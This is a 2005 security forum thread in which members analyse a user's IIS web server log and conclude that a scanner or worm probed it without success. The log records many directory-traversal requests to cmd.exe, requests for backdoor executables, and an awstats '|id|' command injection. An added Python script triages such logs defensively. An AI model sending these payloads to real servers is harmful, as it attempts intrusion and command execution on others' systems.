OMG Is this a logfile of me being hacked on IIS

  1. #1
    Senior Member treanglin's Avatar
    Join Date
    Dec 2003
    Posts
    110

    OMG Is this a logfile of me being hacked on IIS

    #Software: Microsoft Internet Information Services 6.0
    #Version: 1.0
    #Date: 2005-03-05 03:01:32
    #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
    2005-03-05 03:01:32 192.168.1.108 POST /_vti_bin/_vti_aut/fp30reg.dll - 80 - 66.67.184.150 - 500 0 126
    #Software: Microsoft Internet Information Services 6.0
    #Version: 1.0
    #Date: 2005-03-05 05:02:22
    #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
    2005-03-05 05:02:22 192.168.1.108 POST /_vti_bin/_vti_aut/fp30reg.dll - 80 - 66.67.235.161 - 500 0 126
    #Software: Microsoft Internet Information Services 6.0
    #Version: 1.0
    #Date: 2005-03-05 10:56:17
    #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
    2005-03-05 10:56:17 192.168.1.108 HEAD /iisstart.htm - 80 - 68.36.205.30 - 200 0 0
    2005-03-05 11:08:09 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:09 192.168.1.108 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:10 192.168.1.108 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:11 192.168.1.108 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 87
    2005-03-05 11:08:11 192.168.1.108 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 87
    2005-03-05 11:08:12 192.168.1.108 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:12 192.168.1.108 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:15 192.168.1.108 GET /_vti_bin/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:15 192.168.1.108 GET /c/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:17 192.168.1.108 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:18 192.168.1.108 GET /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:18 192.168.1.108 GET /adsamples/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:18 192.168.1.108 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:18 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:20 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:20 192.168.1.108 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 64
    2005-03-05 11:08:21 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:21 192.168.1.108 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:21 192.168.1.108 GET /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:22 192.168.1.108 GET /_vti_cnf/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:22 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:22 192.168.1.108 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:23 192.168.1.108 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:23 192.168.1.108 GET /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:25 192.168.1.108 GET /scripts..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:25 192.168.1.108 GET /d/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:25 192.168.1.108 GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:25 192.168.1.108 GET /cgi-bin/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:25 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:25 192.168.1.108 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:25 192.168.1.108 GET /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:25 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:26 192.168.1.108 GET /samples/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:27 192.168.1.108 GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:27 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:27 192.168.1.108 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:27 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:29 192.168.1.108 GET /scripts/line.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:29 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:31 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:31 192.168.1.108 GET /scripts/cmd1.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:31 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:31 192.168.1.108 GET /scripts/bs.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:31 192.168.1.108 GET /scripts/sensepost.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:32 192.168.1.108 GET /scripts/kimroot.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:32 192.168.1.108 GET /scripts/win32.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:32 192.168.1.108 GET /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:34 192.168.1.108 GET /scripts/eXe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:34 192.168.1.108 GET /scripts/sys.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:34 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:34 192.168.1.108 GET /scripts/boot.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:34 192.168.1.108 GET /scripts/........winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:35 192.168.1.108 GET /scripts/lol.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:35 192.168.1.108 GET /scripts/exe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:35 192.168.1.108 GET /scripts/cmd3.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:35 192.168.1.108 GET /scripts/superlol.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:36 192.168.1.108 GET /scripts/a.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:37 192.168.1.108 GET /scripts/monkey.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:37 192.168.1.108 GET /scripts/max-loh.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:37 192.168.1.108 GET /scripts/winelt.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:37 192.168.1.108 GET /scripts/exchange.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:37 192.168.1.108 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/rundll.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/un.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/script.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/cmd2.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/some.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/drone.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/serverdata.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/****.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/Serverdata.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/z.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/echo.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/ccc.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/sykon.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/root1.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:40 192.168.1.108 GET /scripts/smss.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:40 192.168.1.108 GET /scripts/az.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:40 192.168.1.108 GET /scripts/aagweb.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:43 192.168.1.108 GET /scripts/mkhe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:43 192.168.1.108 GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:45 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:45 192.168.1.108 GET /scripts/root.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:48 192.168.1.108 GET /scripts/test.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:49 192.168.1.108 GET /scripts/shell.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:50 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    #Software: Microsoft Internet Information Services 6.0
    #Version: 1.0
    #Date: 2005-03-05 23:00:37
    #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
    2005-03-05 23:00:37 192.168.1.108 GET /cgi-bin/awstats/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
    2005-03-05 23:00:37 192.168.1.108 GET /cgi-bin/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
    2005-03-05 23:00:37 192.168.1.108 GET /cgi/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
    "Do you know why the system is slow?" they ask

    "It's probably something to do with..." I look up today's excuse ".. clock speed"
    -BOFH

  2. #2
    Junior Member
    Join Date
    Feb 2005
    Posts
    9
    It certainly is. Most likely just some worm-infected machine somewhere attempting to spread itself. Looks like all the requests received a 404 file not found error which is fine. Just make sure your machine is patched and IIS is locked down.

  3. #3
    THE Bastard Sys***** dinowuff's Avatar
    Join Date
    Jun 2003
    Location
    Third planet from the Sun
    Posts
    1,250
    I count 5 worms, 2 trojans and one rootkit. Anyone?

    [edit] 2 root kits I just did a quick once over
    09:F9:11:02:9D:74:E3:5B8:41:56:C5:63:56:88:C0

  4. #4
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Short Answer: Looks like a combination of URL scanner and script kiddies. None were successful.

    Long Answer:

    From your log file, the columns (roughly) are:

    Date Time Server IP CMD/URL PORT - Source IP - User-Agent (read browser) HTTP Return code

    So...the first thing you should probably be concerned with is the HTTP return code. A quick glance reveals they are all 404 or 500. What is this you might ask ?

    A quick check here: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    And 404 means Not Found (as in the file they were after doesn't exist)
    And 500 means Internal Server Error (this could be a little something to worry about).

    Anyway...other interesting things to note...the user agents that show up are either Mozilla/?? or Mozilla/4.0+(blah blah). Now this to me is interesting because it indicates the first one has a forged user-agent field, which means it could be changed as it is sent out or most likely indicates a scripted attack. The second is interesting because that is a valid user-agent and, if not altered/forged (which it still could be), would tend to indicate it was a directed attack by a user.

    The timing on the first (approx. 2-3 s between URLs) would also indicate a scripted attack, so that is where I would lean on that one. The second one is probably just some script kiddie looking for someone who is running awstats and is trying to take advantage of a fairly recent vulnerability that was announced with it.

    Lastly, just noticed the first two (not sure how I missed that). Looks like someone was trying to post using front page but it created a server error. This could be for one of many reasons, but regardless was a failed attempt.
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)
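
An added example, not part of any poster's reply: a short Python triage of a W3C extended log like the one in post #1, applying the checks post #4 walks through (column names from `#Fields`, per-client status codes, User-Agent, timing). The sample lines, the documentation-range client addresses and the `PROBE` heuristic are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed sample in the W3C extended format of the log in post #1.
# Client addresses are documentation-range placeholders, not from the thread.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2005-03-05 10:56:17 192.168.1.108 HEAD /iisstart.htm - 80 - 203.0.113.7 - 200 0 0
2005-03-05 11:08:09 192.168.1.108 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 203.0.113.7 Mozilla/?? 404 0 3
2005-03-05 11:08:10 192.168.1.108 GET /_vti_bin/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 203.0.113.7 Mozilla/?? 500 0 87
2005-03-05 11:08:11 192.168.1.108 GET /scripts/root.exe /c+dir+c:\ 80 - 203.0.113.7 Mozilla/?? 404 0 3
2005-03-05 23:00:37 192.168.1.108 GET /cgi-bin/awstats.pl configdir=|%20id%20| 80 - 198.51.100.9 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
2005-03-06 01:00:00 192.168.1.108 GET /scripts/root.exe /c+dir+c:\ 80 - 192.0.2.44 Mozilla/?? 200 0 0
"""

# Assumed triage heuristic: decoded ../ or ..\ sequences, a requested .exe, or a pipe.
PROBE = re.compile(r"\.\.[\\/]|\.exe\b|\|")

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # IIS repeats this header on restart
        elif line and not line.startswith("#"):
            values = line.split()              # IIS writes spaces in values as '+'
            if len(values) == len(fields):     # skip truncated or foreign lines
                yield dict(zip(fields, values))

def triage(text):
    """Per client: totals, probe timing, probe status codes, probes not refused."""
    acc = defaultdict(lambda: {"requests": 0, "agents": set(), "probe_times": [],
                               "probe_status": Counter(), "review": []})
    for r in parse_w3c(text):
        c = acc[r["c-ip"]]
        c["requests"] += 1
        c["agents"].add(r["cs(User-Agent)"])
        uri = unquote(r["cs-uri-stem"] + " " + r["cs-uri-query"]).lower()
        if not PROBE.search(uri):
            continue
        status = int(r["sc-status"])
        c["probe_times"].append(
            datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S"))
        c["probe_status"][status] += 1         # post #4 singles out 500 for a second look
        if status < 400:                       # a probe that was not refused
            c["review"].append((r["cs-uri-stem"], status))
    report = {}
    for ip, c in acc.items():
        t = c["probe_times"]
        report[ip] = {
            "requests": c["requests"],
            "probes": len(t),
            "probe_span_s": (max(t) - min(t)).total_seconds() if t else 0.0,
            "probe_status": dict(c["probe_status"]),
            "agents": sorted(c["agents"]),
            "review": c["review"],
        }
    return report

if __name__ == "__main__":
    for ip, row in triage(SAMPLE_LOG).items():
        print(ip, row)
```

Any client with a non-empty `review` list had a probe-shaped request answered with a status below 400, which is the case to investigate first.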

  5. #5
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    Yep, this looks like Nikto at work...

    NIKTO README

    The IP address of the remote host returns this:

    06/03/05 16:24:06 IP block 68.36.205.30
    Trying 68.36.205.30 at ARIN
    Trying 68.36.205 at ARIN
    Comcast Cable Communications, Inc. JUMPSTART-1 (NET-68-32-0-0-1)
    68.32.0.0 - 68.63.255.255
    Comcast Cable Communications, Inc. NJ-NORTH-1 (NET-68-36-0-0-1)
    68.36.0.0 - 68.36.255.255

    # ARIN WHOIS database, last updated 2005-06-02 19:10
    # Enter ? for additional hints on searching ARIN's WHOIS database.

    Neb gave you a ton of good info, this is just the cleanup work. A clown on Comcast Cable is where the scan came from.

    --TH13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  6. #6
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    I dunno.... It looks like a perfectly normal daily log file entry on a computer that is secured and patched against the exploits tried.....

    Treanglin: You're fine... get used to them.... Learn to look for the returned error code, (403, 404, 500 etc.). If the error code is above 400 then nothing bad happened except, possibly, some information gathering. However, information gathering will not usually come in a burst like this unless you have an impatient attacker that is simply testing to see if you are vulnerable to any of the old stuff. What this would usually tell you about the attacker is that he probably doesn't fully grasp his NMap and other tools output or that he won't be able to go much further in penetrating your system because he doesn't write his own stuff - if he did he wouldn't be doing such an obvious scan which is what this would be if it weren't a worm.
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

  7. #7
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    LOL. As Tiger said, this guy isn't very slick. The traffic he threw against your box would be the same as a robber ringing the doorbell before he tried to break in.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  8. #8
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    FSCK, FSCK, FSCK....

    Note to Self: Fix Doorbell......

    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

  9. #9
    Senior Member RoadClosed's Avatar
    Join Date
    Jun 2003
    Posts
    3,834
    Ring Ring, not to mention most new firewalls would have slipped the dead bolt while he was peeking in the front window.
    West of House
    You are standing in an open field west of a white house, with a boarded front door.
    There is a small mailbox here.

  10. #10
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Originally posted here by thehorse13
    LOL. As Tiger said, this guy isn't very slick. The traffic he threw against your box would be the same as a robber ringing the doorbell before he tried to break in.
    No respect for common courtesy anymore. If you don't ring the door bell, there is a chance someone is inside. I would ring the door bell, that way if someone answered you act like a salesman and move on.
    Kill the lights, let the candles burn behind the pumpkins' mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween. The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux
